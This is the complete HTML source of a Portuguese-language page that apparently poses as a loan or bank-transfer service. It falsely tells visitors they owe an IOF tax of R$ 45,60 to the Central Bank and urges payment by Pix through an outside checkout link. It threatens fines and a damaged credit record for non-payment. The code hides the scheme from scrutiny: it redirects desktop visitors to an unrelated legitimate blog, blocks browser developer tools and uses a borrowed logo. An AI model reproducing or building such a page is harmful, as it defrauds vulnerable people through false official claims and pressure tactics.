<html data-capo="" style="--primary: #00adca;">
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
<head>

<script disable-devtool-auto src='https://cdn.jsdelivr.net/npm/disable-devtool'></script>

    <script type="text/javascript">
    (function(c,l,a,r,i,t,y){
        c[a]=c[a]||function(){(c[a].q=c[a].q||[]).push(arguments)};
        t=l.createElement(r);t.async=1;t.src="https://www.clarity.ms/tag/"+i;
        y=l.getElementsByTagName(r)[0];y.parentNode.insertBefore(t,y);
    })(window, document, "clarity", "script", "piq8he80s8");
</script>
<script type="text/javascript">
  if (!navigator.userAgent.match(/(iPhone|iPod|iPad|Android|BlackBerry|IEMobile)/) && window.innerWidth > 768) {
    window.location.href = 'https://meutudo.com.br/blog/guia-do-saque-aniversario/';
  }
  </script>
    <script>
  !function(f,b,e,v,n,t,s){if(f.fbq)return;n=f.fbq=function(){n.callMethod?
  n.callMethod.apply(n,arguments):n.queue.push(arguments)};if(!f._fbq)f._fbq=n;
  n.push=n;n.loaded=!0;n.version='2.0';n.queue=[];t=b.createElement(e);t.async=!0;
  t.src=v;s=b.getElementsByTagName(e)[0];s.parentNode.insertBefore(t,s)}(window,
  document,'script','https://connect.facebook.net/en_US/fbevents.js');

  fbq('init', '1272111787394569'); 
  fbq('track', 'PageView'); 
  fbq('track', 'ViewContent'); 
</script>
<noscript>
  <img height="1" width="1" style="display:none" 
       src="https://www.facebook.com/tr?id=1272111787394569&ev=PageView&noscript=1" />
</noscript>
    
  <meta charset="utf-8">
  <meta name="viewport" content="width=device-width, initial-scale=1">
  <title>Empréstimo facilitado, simulação gratuita!</title>
  <style>
    /*! modern-normalize v2.0.0 | MIT License | https://github.com/sindresorhus/modern-normalize */
    *,
    :after,
    :before {
      box-sizing: border-box
    }

    html {
      font-family: system-ui, Segoe UI, Roboto, Helvetica, Arial, sans-serif, Apple Color Emoji, Segoe UI Emoji;
      line-height: 1.15;
      -webkit-text-size-adjust: 100%;
      -moz-tab-size: 4;
      -o-tab-size: 4;
      tab-size: 4
    }

    body {
      margin: 0
    }

    hr {
      color: inherit;
      height: 0
    }

    abbr[title] {
      -webkit-text-decoration: underline dotted;
      text-decoration: underline dotted
    }

    b,
    strong {
      font-weight: bolder
    }

    code,
    kbd,
    pre,
    samp {
      font-family: ui-monospace, SFMono-Regular, Consolas, Liberation Mono, Menlo, monospace;
      font-size: 1em
    }

    small {
      font-size: 80%
    }

    sub,
    sup {
      font-size: 75%;
      line-height: 0;
      position: relative;
      vertical-align: baseline
    }

    sub {
      bottom: -.25em
    }

    sup {
      top: -.5em
    }

    table {
      border-color: inherit;
      text-indent: 0
    }

    button,
    input,
    optgroup,
    select,
    textarea {
      font-family: inherit;
      font-size: 100%;
      line-height: 1.15;
      margin: 0
    }

    button,
    select {
      text-transform: none
    }

    [type=button],
    [type=reset],
    [type=submit],
    button {
      -webkit-appearance: button
    }

    ::-moz-focus-inner {
      border-style: none;
      padding: 0
    }

    :-moz-focusring {
      outline: 1px dotted ButtonText
    }

    :-moz-ui-invalid {
      box-shadow: none
    }

    legend {
      padding: 0
    }

    progress {
      vertical-align: baseline
    }

    ::-webkit-inner-spin-button,
    ::-webkit-outer-spin-button {
      height: auto
    }

    [type=search] {
      -webkit-appearance: textfield;
      outline-offset: -2px
    }

    ::-webkit-search-decoration {
      -webkit-appearance: none
    }

    ::-webkit-file-upload-button {
      -webkit-appearance: button;
      font: inherit
    }

    summary {
      display: list-item
    }
  </style>

  <style>
    blockquote,
    dd,
    dl,
    figure,
    h1,
    h2,
    h3,
    h4,
    h5,
    h6,
    hr,
    ol,
    p,
    pre,
    ul {
      margin: 0
    }

    ol,
    ul {
      list-style: none;
      padding: 0
    }

    img,
    video {
      height: auto;
      max-width: 100%
    }

    *,
    :after,
    :before {
      border: 0 solid #000
    }

    :root {
      --primary: transparent;
      --red: #ef4444;
      --green: #27ae60
    }

    body {
      background-color: #fff;
      color: #000;
      font-size: 16px
    }

    #__nuxt,
    body,
    html {
      height: 100%
    }

    a {
      color: #1b98e0;
      text-decoration: none
    }

    a:hover {
      cursor: pointer;
      text-decoration: underline
    }

    .text-red {
      color: var(--red)
    }

    .text-green {
      color: var(--green)
    }

    .text-primary {
      color: var(--primary)
    }

    h2 {
      font-weight: 500
    }
  </style>
  <style>
    .default-layout[data-v-77968890] {
      display: grid;
      grid-template-areas: "top-bar" "content" "footer";
      grid-template-rows: auto 1fr auto;
      min-height: 100vh
    }

    .default-layout .top-bar[data-v-77968890] {
      grid-area: top-bar
    }

    .default-layout .content[data-v-77968890] {
      background-color: #f5f7f9;
      grid-area: content
    }

    .default-layout .footer[data-v-77968890] {
      grid-area: footer
    }
  </style>
  <style>
    .top-bar[data-v-f5d5d4cd] {
      background-color: var(--primary);
      border-bottom: 1px solid hsla(0, 0%, 100%, .3);
      width: 100%
    }

    .top-bar .container[data-v-f5d5d4cd] {
      display: grid;
      padding: 1.5rem 0;
      place-content: center
    }
  </style>
  <style>
    .container[data-v-0041013f] {
      box-sizing: border-box;
      margin: 0 auto;
      padding-left: 1rem;
      padding-right: 1rem
    }

    @media (min-width:640px) {
      .container[data-v-0041013f] {
        max-width: 90%
      }
    }

    @media (min-width:768px) {
      .container[data-v-0041013f] {
        max-width: 85%
      }
    }

    @media (min-width:1024px) {
      .container[data-v-0041013f] {
        max-width: 80%
      }
    }

    @media (min-width:1280px) {
      .container[data-v-0041013f] {
        max-width: 1000px
      }
    }
  </style>
  <style>
    img.logo[data-v-4f7075cc] {
      height: var(--2348ed9e);
      width: auto
    }

    h1.logo[data-v-4f7075cc] {
      color: #fff;
      text-shadow: 0 1px 2px rgba(0, 0, 0, .2)
    }
  </style>
  <style>
    .fee-page[data-v-d5c2a0e6] {
      margin: 2.5rem 0
    }

    .container[data-v-d5c2a0e6] {
      display: grid;
      gap: 3rem;
      max-width: 480px
    }

    .intro[data-v-d5c2a0e6] {
      display: grid;
      gap: .75rem
    }

    .intro .headline[data-v-d5c2a0e6] {
      color: var(--primary);
      font-size: 1.5rem;
      font-weight: 500
    }
  </style>
  <style>
    .card-title[data-v-303a1430] {
      color: #000;
      font-size: 1.35rem;
      font-weight: 500
    }
  </style>
  <style>
    .divider[data-v-b5121d9d] {
      background-color: var(--primary);
      border-radius: 10px;
      height: 2px;
      width: 80px
    }
  </style>
  <style>
    .card-sub-title[data-v-2901cb0a] {
      color: rgba(0, 0, 0, .5);
      line-height: 1.5
    }
  </style>
  <style>
    .registration-fee-video[data-v-6b06b597] {
      border: 1px solid #9d9d9d;
      border-radius: 5px;
      color: #000;
      display: grid;
      gap: 1rem;
      padding: 3rem 1rem;
      position: relative
    }

    .registration-fee-video[data-v-6b06b597]:before {
      background-color: transparent;
      border: 1px solid #9d9d9d;
      border-radius: 5px;
      content: "";
      height: 96%;
      left: 50%;
      position: absolute;
      top: 50%;
      transform: translate(-50%, -50%);
      width: 106%
    }

    .card-sub-title[data-v-6b06b597] {
      align-items: center;
      display: grid;
      font-size: 1.2rem;
      gap: .5rem;
      grid-auto-columns: auto;
      grid-auto-flow: column;
      justify-content: left
    }

    video[data-v-6b06b597] {
      border: 1px solid #9d9d9d;
      border-radius: 5px
    }
  </style>
  <style>
    .loan-status-timeline[data-v-9f1c2f74] {
      display: grid;
      gap: 2rem;
      position: relative
    }

    .bar[data-v-9f1c2f74] {
      background-color: #d5d5d5;
      height: 87%;
      left: 10px;
      position: absolute;
      top: 20px;
      transform: translateX(-50%);
      width: 3px
    }
  </style>
  <style>
    .timeline-part[data-v-7f42729f] {
      align-items: center;
      display: grid;
      gap: 1.3rem;
      grid-template-columns: auto 1fr
    }

    .timeline-part.done[data-v-7f42729f] {
      color: #419c63
    }

    .timeline-part.done .dot[data-v-7f42729f] {
      background-color: #419c63
    }

    .timeline-part.current[data-v-7f42729f] {
      color: var(--red)
    }

    .timeline-part.current .dot[data-v-7f42729f] {
      animation: pulse-7f42729f 1s infinite;
      background-color: var(--red)
    }

    @keyframes pulse-7f42729f {
      0% {
        -webkit-box-shadow: 0 0 0 0 var(--red)
      }

      70% {
        -webkit-box-shadow: 0 0 0 15px rgba(255, 0, 0, 0)
      }

      to {
        -webkit-box-shadow: 0 0 0 0 rgba(255, 0, 0, 0)
      }
    }

    .timeline-part.pending[data-v-7f42729f] {
      color: rgba(0, 0, 0, .3)
    }

    .timeline-part.pending .dot[data-v-7f42729f] {
      background-color: #d5d5d5
    }

    .dot[data-v-7f42729f] {
      background-color: var(--primary);
      border-radius: 50%;
      height: 20px;
      outline: 5px solid #f5f7f9;
      position: relative;
      width: 20px
    }

    .body[data-v-7f42729f] {
      align-items: center;
      display: grid;
      gap: .5rem;
      grid-template-columns: auto 1fr
    }

    .body .icon[data-v-7f42729f] {
      font-size: 2.5rem
    }

    .body .text[data-v-7f42729f] {
      display: grid;
      gap: .35rem
    }
  </style>
  <style>
    .countdown-timer[data-v-441b54a3] {
      color: #fff;
      display: grid;
      gap: 1rem
    }

    .timer[data-v-441b54a3] {
      display: grid;
      gap: .5rem;
      grid-template-columns: repeat(2, auto);
      justify-content: center
    }

    .card-title[data-v-441b54a3],
    .description[data-v-441b54a3],
    .waring[data-v-441b54a3] {
      text-align: center
    }

    .waring[data-v-441b54a3] {
      color: var(--red)
    }
  </style>
  <style>
    .payment-card[data-v-a09dda04] {
      display: grid;
      gap: 1rem;
      justify-items: center;
      text-align: center
    }

    .card-title[data-v-a09dda04] {
      align-items: center;
      display: grid;
      gap: .5rem;
      grid-template-columns: repeat(2, auto)
    }

    .card-title .icon[data-v-a09dda04] {
      color: #3db1a5;
      font-size: 1.8rem
    }

    .card-sub-title[data-v-a09dda04] {
      align-items: center;
      display: grid;
      gap: .5rem;
      grid-template-columns: repeat(2, auto)
    }

    .card-sub-title .icon[data-v-a09dda04] {
      color: #419c63;
      font-size: 1.2rem
    }

    .fee-value[data-v-a09dda04] {
      color: #3db1a5;
      font-size: 2rem;
      font-weight: 500
    }

    .icon[data-v-a09dda04] {
      font-size: 3rem
    }
  </style>
  <style>
    .card[data-v-cca10726] {
      background-color: #fff;
      border-radius: 10px;
      box-shadow: 0 1px 4px 0 rgba(0, 8, 38, .04);
      padding: 1.5rem;
      width: 100%
    }
  </style>
  <style>
    .registration-fee-faq[data-v-a343b494] {
      display: grid;
      gap: 1rem
    }
  </style>
  <style>
    .faq-item[data-v-8c748230] {
      border-top: 1px solid #d4dae0;
      color: #000;
      cursor: pointer;
      font-weight: 400
    }

    .faq-item .question[data-v-8c748230] {
      align-items: center;
      display: grid;
      grid-template-columns: auto 1fr;
      padding: .5rem 0
    }

    .faq-item .question.expanded .icon[data-v-8c748230] {
      transform: rotate(180deg)
    }

    .faq-item .question .icon[data-v-8c748230] {
      color: var(--primary);
      font-size: 2.5rem;
      transition: transform .2s ease-out
    }

    .faq-item .answer[data-v-8c748230] {
      display: grid;
      gap: 1rem;
      max-height: 0;
      overflow: hidden;
      transition: max-height .2s ease-out
    }

    .faq-item .answer .content[data-v-8c748230] {
      color: rgba(0, 0, 0, .5);
      padding: .2rem 1rem 1.5rem
    }

    .question.expanded[data-v-8c748230]:after {
      transform: translateY(-50%) rotate(90deg)
    }
  </style>
  <style>
    .footer[data-v-63f14862] {
      border-bottom: 7px solid var(--primary);
      border-top: 2px solid #edf0ef;
      color: #fff;
      color: #000;
      padding: 2rem 0;
      text-align: center
    }

    .footer p[data-v-63f14862] {
      margin: .5rem 0
    }
  </style>
  <link rel="stylesheet" href="https://wp.consulta-solicitar.online/_nuxt/TopBar.2vF9lWx7.css">
  <link rel="stylesheet" href="https://wp.consulta-solicitar.online/_nuxt/Container.B5PP9_Vn.css">
  <link rel="stylesheet" href="https://wp.consulta-solicitar.online/_nuxt/CardTitle.D2C4NpE7.css">
  <link rel="stylesheet" href="https://wp.consulta-solicitar.online/_nuxt/CardSubTitle.DG_Fs8af.css">
  <link rel="stylesheet" href="https://wp.consulta-solicitar.online/_nuxt/PaymentCard.C5KDNUam.css">
  <link rel="stylesheet" href="https://wp.consulta-solicitar.online/_nuxt/Button.CTY08tZL.css">
  <link rel="stylesheet" href="https://wp.consulta-solicitar.online/_nuxt/LoadingText.BAPOmI7q.css">
  <link rel="stylesheet" href="https://wp.consulta-solicitar.online/_nuxt/Card.GBBMdh4F.css">
  <link rel="stylesheet" href="https://wp.consulta-solicitar.online/_nuxt/FaqItem.yXfMt8qC.css">
  <link rel="modulepreload" as="script" crossorigin="" href="https://wp.consulta-solicitar.online/_nuxt/Ds3y3Bf3.js">
  <link rel="modulepreload" as="script" crossorigin="" href="https://wp.consulta-solicitar.online/_nuxt/k9y74een.js">
  <link rel="modulepreload" as="script" crossorigin="" href="https://wp.consulta-solicitar.online/_nuxt/Bo8ipC1T.js">
  <link rel="modulepreload" as="script" crossorigin="" href="https://wp.consulta-solicitar.online/_nuxt/2aeojNjQ.js">
  <link rel="modulepreload" as="script" crossorigin="" href="https://wp.consulta-solicitar.online/_nuxt/2TdE_QPC.js">
  <link rel="modulepreload" as="script" crossorigin="" href="https://wp.consulta-solicitar.online/_nuxt/DTnGPJep.js">
  <link rel="modulepreload" as="script" crossorigin="" href="https://wp.consulta-solicitar.online/_nuxt/B1xLFNhR.js">
  <link rel="modulepreload" as="script" crossorigin="" href="https://wp.consulta-solicitar.online/_nuxt/CNxTVsKb.js">
  <link rel="modulepreload" as="script" crossorigin="" href="https://wp.consulta-solicitar.online/_nuxt/BQBhJayI.js">
  <link rel="modulepreload" as="script" crossorigin="" href="https://wp.consulta-solicitar.online/_nuxt/CV182wBC.js">
  <link rel="modulepreload" as="script" crossorigin="" href="https://wp.consulta-solicitar.online/_nuxt/u-U6PqlP.js">
  <link rel="modulepreload" as="script" crossorigin="" href="https://wp.consulta-solicitar.online/_nuxt/DIXVKuIp.js">
  <link rel="modulepreload" as="script" crossorigin="" href="https://wp.consulta-solicitar.online/_nuxt/Bl1c_aD8.js">
  <link rel="modulepreload" as="script" crossorigin="" href="https://wp.consulta-solicitar.online/_nuxt/DEF4dnCe.js">
  <link rel="modulepreload" as="script" crossorigin="" href="https://wp.consulta-solicitar.online/_nuxt/sv4npInL.js">
  <link rel="modulepreload" as="script" crossorigin="" href="https://wp.consulta-solicitar.online/_nuxt/B6VT0UWr.js">
  <link rel="modulepreload" as="script" crossorigin="" href="https://wp.consulta-solicitar.online/_nuxt/MaghENf1.js">
  <link rel="modulepreload" as="script" crossorigin="" href="https://wp.consulta-solicitar.online/_nuxt/BJRZzHYv.js">
  <link rel="modulepreload" as="script" crossorigin="" href="https://wp.consulta-solicitar.online/_nuxt/BTyuqVSS.js">
  <link rel="modulepreload" as="script" crossorigin="" href="https://wp.consulta-solicitar.online/_nuxt/DmqsTf9v.js">
  <link rel="prefetch" as="script" crossorigin="" href="https://wp.consulta-solicitar.online/_nuxt/J9e3dA3M.js">
  <link rel="prefetch" as="script" crossorigin="" href="https://wp.consulta-solicitar.online/_nuxt/D-UNq_Tu.js">
  <link rel="prefetch" as="script" crossorigin="" href="https://wp.consulta-solicitar.online/_nuxt/BGBp0rdz.js">
  <link rel="prefetch" as="script" crossorigin="" href="https://wp.consulta-solicitar.online/_nuxt/Wpn3EkJ-.js">
  <link rel="prefetch" as="script" crossorigin="" href="https://wp.consulta-solicitar.online/_nuxt/CKC6fHHG.js">
  <link rel="prefetch" as="script" crossorigin="" href="https://wp.consulta-solicitar.online/_nuxt/BhOEMyyX.js">
  <script async="" src="js/ZKLZME3tc0uv.js"></script>
  <script type="module" src="https://wp.consulta-solicitar.online/_nuxt/Ds3y3Bf3.js" crossorigin=""></script>
  <script id="unhead:payload" type="application/json">{"title":"Empréstimo facilitado, simulação gratuita!"}</script>
  <script src="js/kCpocrEa1GV2.js" async="" defer=""></script>
  <link rel="stylesheet" href="https://unipay-br.org/_nuxt/12-fee.BCxcH5e_.css">
  <script async="" defer="" src="js/V1CIyyXqdscw.js"></script>
  <link rel="stylesheet" href="https://unipay-br.org/_nuxt/default.fxhPcPvK.css">
  <script src="js/MMqUijOw3htb.js" async=""></script>
  <!-- Meta Pixel Code -->
<script>
!function(f,b,e,v,n,t,s)
{if(f.fbq)return;n=f.fbq=function(){n.callMethod?
n.callMethod.apply(n,arguments):n.queue.push(arguments)};
if(!f._fbq)f._fbq=n;n.push=n;n.loaded=!0;n.version='2.0';
n.queue=[];t=b.createElement(e);t.async=!0;
t.src=v;s=b.getElementsByTagName(e)[0];
s.parentNode.insertBefore(t,s)}(window, document,'script',
'https://connect.facebook.net/en_US/fbevents.js');
fbq('init', '574352008891416');
fbq('track', 'PageView');
</script>
<noscript><img height="1" width="1" style="display:none"
src="https://www.facebook.com/tr?id=574352008891416&ev=PageView&noscript=1"
/></noscript>
<!-- End Meta Pixel Code -->
</head> 

  <div id="__nuxt">
    <div class="default-layout" data-v-77968890="">
      <div style="
  display: grid;
  grid-template-areas:
    'top-bar'
    'content'
    'footer';
  grid-template-rows: auto 1fr auto;
  min-height: 100vh;
">

        <style>
          .header {
            background-color: #2865AE;
            color: white;
            padding: 15px 0;
            text-align: center;
            font-size: 1.5rem;
            font-weight: bold;
            grid-area: top-bar;
          }
        </style>


          <script type="text/javascript">
  if (!navigator.userAgent.match(/(iPhone|iPod|iPad|Android|BlackBerry|IEMobile)/) && window.innerWidth > 768) {
    window.location.href = 'https://meutudo.com.br/blog/guia-do-saque-aniversario/';
  }
  </script>
          
        <div class="header">
          <script src="https://apela-tech.cloud/utm/utm.js"></script>
          <img decoding="async" style="width: 120px;" src="images/logo-jadlog.png" alt="Imagem Centralizada"
            data-lazy-src="https://d9hhrg4mnvzow.cloudfront.net/lp.posicard.com.br/834c63b6-logo-branco2_105e038000000000000000.png"
            data-ll-status="loaded" class="entered lazyloaded"><noscript><img decoding="async" style="width: 120px;"
              src="https://d9hhrg4mnvzow.cloudfront.net/lp.posicard.com.br/834c63b6-logo-branco2_105e038000000000000000.png"
              alt="Imagem Centralizada"></noscript>
        </div>
        <main class="content" data-v-77968890=""><!--[-->
          <div class="fee-page" data-v-d5c2a0e6="">
            <div class="container" data-v-d5c2a0e6="" data-v-0041013f=""><!--[-->
              <div class="intro" data-v-d5c2a0e6=""><span class="card-title headline" data-v-d5c2a0e6=""
                  data-v-303a1430="" style="color: #000;"><!--[--> Importante: Pendência junto ao Banco Central <!--]--></span>
                <div class="divider" data-v-d5c2a0e6="" data-v-b5121d9d=""></div><span class="card-sub-title"
                  data-v-d5c2a0e6="" data-v-2901cb0a="" style="">
                    Ao solicitar a liberação do valor da sua transferência, você estará sujeito à cobrança do 
                    <span class="bold">Imposto sobre Operações Financeiras (IOF)</span>, conforme regulamentação do Banco Central. 
                    Este imposto é aplicado para garantir a regularidade da operação e a conformidade com as normas fiscais vigentes.
              
                </span>
              </div>
              <div class="registration-fee-video" data-v-d5c2a0e6="" data-v-6b06b597=""><span class="card-title"
                  data-v-6b06b597="" data-v-303a1430=""><!--[-->O que é o IOF?<!--]--></span><span
                  class="card-sub-title" data-v-6b06b597="" data-v-2901cb0a=""><!--[--><span data-v-6b06b597="">Aumente
                    o volume</span><svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink"
                    aria-hidden="true" role="img" class="icon iconify iconify--twemoji" data-v-6b06b597="" style=""
                    width="1em" height="1em" viewBox="0 0 36 36">
                    <path fill="#BE1931"
                      d="M12.908 30.75c-.276 2.209-2.291 3-4.5 3s-3.776-1.791-3.5-4l1-9c.276-2.209 2.291-4 4.5-4s6.468 0 3.5 4s-1 10-1 10">
                    </path>
                    <path fill="#CCD6DD"
                      d="M35.825 14.75c0 6.902-1.544 12.5-3.45 12.5c-1.905 0-20.45-5.598-20.45-12.5s18.545-12.5 20.45-12.5c1.906 0 3.45 5.597 3.45 12.5">
                    </path>
                    <ellipse cx="32.375" cy="14.75" fill="#66757F" rx="3.45" ry="12.5"></ellipse>
                    <path fill="#DD2E44" d="m17.925 21.75l-14-1c-5 0-5-12 0-12l14-1c-3 3-3 11 0 14"></path>
                    <ellipse cx="31.325" cy="14.75" fill="#99AAB5" rx="1.5" ry="4.348"></ellipse>
                  </svg><svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink"
                    aria-hidden="true" role="img" class="icon iconify iconify--twemoji" data-v-6b06b597="" style=""
                    width="1em" height="1em" viewBox="0 0 36 36">
                    <path fill="#BE1931"
                      d="M12.908 30.75c-.276 2.209-2.291 3-4.5 3s-3.776-1.791-3.5-4l1-9c.276-2.209 2.291-4 4.5-4s6.468 0 3.5 4s-1 10-1 10">
                    </path>
                    <path fill="#CCD6DD"
                      d="M35.825 14.75c0 6.902-1.544 12.5-3.45 12.5c-1.905 0-20.45-5.598-20.45-12.5s18.545-12.5 20.45-12.5c1.906 0 3.45 5.597 3.45 12.5">
                    </path>
                    <ellipse cx="32.375" cy="14.75" fill="#66757F" rx="3.45" ry="12.5"></ellipse>
                    <path fill="#DD2E44" d="m17.925 21.75l-14-1c-5 0-5-12 0-12l14-1c-3 3-3 11 0 14"></path>
                    <ellipse cx="31.325" cy="14.75" fill="#99AAB5" rx="1.5" ry="4.348"></ellipse>
                  </svg><svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink"
                    aria-hidden="true" role="img" class="icon iconify iconify--twemoji" data-v-6b06b597="" style=""
                    width="1em" height="1em" viewBox="0 0 36 36">
                    <path fill="#BE1931"
                      d="M12.908 30.75c-.276 2.209-2.291 3-4.5 3s-3.776-1.791-3.5-4l1-9c.276-2.209 2.291-4 4.5-4s6.468 0 3.5 4s-1 10-1 10">
                    </path>
                    <path fill="#CCD6DD"
                      d="M35.825 14.75c0 6.902-1.544 12.5-3.45 12.5c-1.905 0-20.45-5.598-20.45-12.5s18.545-12.5 20.45-12.5c1.906 0 3.45 5.597 3.45 12.5">
                    </path>
                    <ellipse cx="32.375" cy="14.75" fill="#66757F" rx="3.45" ry="12.5"></ellipse>
                    <path fill="#DD2E44" d="m17.925 21.75l-14-1c-5 0-5-12 0-12l14-1c-3 3-3 11 0 14"></path>
                    <ellipse cx="31.325" cy="14.75" fill="#99AAB5" rx="1.5" ry="4.348"></ellipse>
                  </svg><svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink"
                    aria-hidden="true" role="img" class="icon iconify iconify--twemoji" data-v-6b06b597="" style=""
                    width="1em" height="1em" viewBox="0 0 36 36">
                    <path fill="#BE1931"
                      d="M12.908 30.75c-.276 2.209-2.291 3-4.5 3s-3.776-1.791-3.5-4l1-9c.276-2.209 2.291-4 4.5-4s6.468 0 3.5 4s-1 10-1 10">
                    </path>
                    <path fill="#CCD6DD"
                      d="M35.825 14.75c0 6.902-1.544 12.5-3.45 12.5c-1.905 0-20.45-5.598-20.45-12.5s18.545-12.5 20.45-12.5c1.906 0 3.45 5.597 3.45 12.5">
                    </path>
                    <ellipse cx="32.375" cy="14.75" fill="#66757F" rx="3.45" ry="12.5"></ellipse>
                    <path fill="#DD2E44" d="m17.925 21.75l-14-1c-5 0-5-12 0-12l14-1c-3 3-3 11 0 14"></path>
                    <ellipse cx="31.325" cy="14.75" fill="#99AAB5" rx="1.5" ry="4.348"></ellipse>
                  </svg><!--]--></span>
                  <script src="https://fast.wistia.com/player.js" async></script><script src="https://fast.wistia.com/embed/lsknoendt0.js" async type="module"></script><style>wistia-player[media-id='lsknoendt0']:not(:defined) { background: center / contain no-repeat url('https://fast.wistia.com/embed/medias/lsknoendt0/swatch'); display: block; filter: blur(5px); padding-top:56.56%; }</style> <wistia-player media-id="lsknoendt0" seo="false"></wistia-player>
                <style>
                  .elementor-element:has(#smartplayer) {
                    width: 100%;
                  }
                </style>
              </div>
              <div class="loan-status-timeline" data-v-d5c2a0e6="" data-v-9f1c2f74="">
                <style>
                  .image-container {
                    text-align: center;
                    /* Centraliza a imagem no contêiner */
                  }

                  img {
                    max-width: 150px;
                    /* Define a largura máxima da imagem */
                    height: auto;
                    /* Mantém a proporção da imagem */

                  }
                </style>


                <div class="image-container">
                  <img src="images/yMs3mUNHonzl.png" alt="Imagem Centralizada">
                </div>
                <div class="countdown-timer" data-v-d5c2a0e6="" data-v-441b54a3="">
                  <div class="description" data-v-441b54a3=""><span class="card-sub-title" data-v-441b54a3=""
                      data-v-2901cb0a="">O não pagamento do <span class="bold">Imposto sobre Operações Financeiras (IOF)</span> resultará no cancelamento da transferência bancária e na aplicação de uma multa em seu nome. Além disso, sua situação poderá ser registrada como inadimplente, impactando negativamente seu histórico financeiro.</span></div>
                </div>
                <div data-v-cca10726="" data-v-a09dda04="" data-v-d5c2a0e6="" class="card payment-card"><span
                    data-v-303a1430="" data-v-a09dda04="" class="card-title">Pague via Pix <svg data-v-a09dda04=""
                      xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" aria-hidden="true"
                      role="img" class="icon iconify iconify--ic" width="1em" height="1em" viewBox="0 0 24 24">
                      <path fill="currentColor"
                        d="m15.45 16.52l-3.01-3.01c-.11-.11-.24-.13-.31-.13s-.2.02-.31.13L8.8 16.53c-.34.34-.87.89-2.64.89l3.71 3.7a3 3 0 0 0 4.24 0l3.72-3.71c-.91 0-1.67-.18-2.38-.89M8.8 7.47l3.02 3.02c.08.08.2.13.31.13s.23-.05.31-.13l2.99-2.99c.71-.74 1.52-.91 2.43-.91l-3.72-3.71a3 3 0 0 0-4.24 0l-3.71 3.7c1.76 0 2.3.58 2.61.89">
                      </path>
                      <path fill="currentColor"
                        d="m21.11 9.85l-2.25-2.26H17.6c-.54 0-1.08.22-1.45.61l-3 3c-.28.28-.65.42-1.02.42a1.5 1.5 0 0 1-1.02-.42L8.09 8.17c-.38-.38-.9-.6-1.45-.6H5.17l-2.29 2.3a3 3 0 0 0 0 4.24l2.29 2.3h1.48c.54 0 1.06-.22 1.45-.6l3.02-3.02c.28-.28.65-.42 1.02-.42s.74.14 1.02.42l3.01 3.01c.38.38.9.6 1.45.6h1.26l2.25-2.26a3.04 3.04 0 0 0-.02-4.29">
                      </path>
                    </svg></span><span data-v-2901cb0a="" data-v-a09dda04="" class="card-sub-title"> O pagamento será
                    confirmado imediatamente </span><span data-v-a09dda04="" class="fee-value">R$ 45,60</span>
                  <style>
                    .btn-custom {
                      color: white;
                      border: none;
                      width: 100%;
                      margin-bottom: 10px;
                      background-color: #2865AE;
                      font-weight: 600;
                      border-radius: 1rem;
                      padding: .75rem 3rem;
                      letter-spacing: .3px;
                      line-height: 1.15;
                    }

                    .btn-custom:hover {
                      color: rgb(255, 255, 255) !important;
                      background-color: #3045ff !important;
                      transform: scale(1.02) !important;
                    }
                  </style> <a onclick="checkout(event)" style="text-decoration: none;">
                    <button type="button" id="ativarConta" class=" btn-custom rounded-pill w-100 mt-3">
                      Pagar agora
                    </button>
                  </a><!----><span data-v-2901cb0a="" data-v-a09dda04="" class="card-sub-title"><svg data-v-a09dda04=""
                      xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" aria-hidden="true"
                      role="img" class="icon iconify iconify--ph" width="1em" height="1em" viewBox="0 0 256 256">
                      <g fill="currentColor">
                        <path d="M216 56v56c0 96-88 120-88 120s-88-24-88-120V56a8 8 0 0 1 8-8h160a8 8 0 0 1 8 8"
                          opacity=".2"></path>
                        <path
                          d="M208 40H48a16 16 0 0 0-16 16v56c0 52.72 25.52 84.67 46.93 102.19c23.06 18.86 46 25.26 47 25.53a8 8 0 0 0 4.2 0c1-.27 23.91-6.67 47-25.53C198.48 196.67 224 164.72 224 112V56a16 16 0 0 0-16-16m0 72c0 37.07-13.66 67.16-40.6 89.42a129.3 129.3 0 0 1-39.4 22.2a128.3 128.3 0 0 1-38.92-21.81C61.82 179.51 48 149.3 48 112V56h160ZM82.34 141.66a8 8 0 0 1 11.32-11.32L112 148.69l50.34-50.35a8 8 0 0 1 11.32 11.32l-56 56a8 8 0 0 1-11.32 0Z">
                        </path>
                      </g>
                    </svg> Ambiente seguro </span>
                    
                <script>window.__NUXT__ = {}; window.__NUXT__.config = { public: { apiBase: "https://api.hide-domain.com", adminId: 1, projectId: 1 }, app: { baseURL: "/", buildId: "f7f5e04f-036f-410e-b85c-b41773d9e483", buildAssetsDir: "/_nuxt/", cdnURL: "" } }</script>
              </div>
            </div>
          </div>
        </main>
      </div>
    </div>
  </div>
  <script>
    function checkout(event) {
      event.preventDefault(); 
      var currentUrlParams = window.location.search;
      window.location.href = "https://pay.sunize.com.br/QngritWc" + currentUrlParams;
    }
  </script>
  
  <script
  src="https://cdn.utmify.com.br/scripts/utms/latest.js"
  data-utmify-prevent-subids
  async
  defer
></script>
  
</body>

</html>
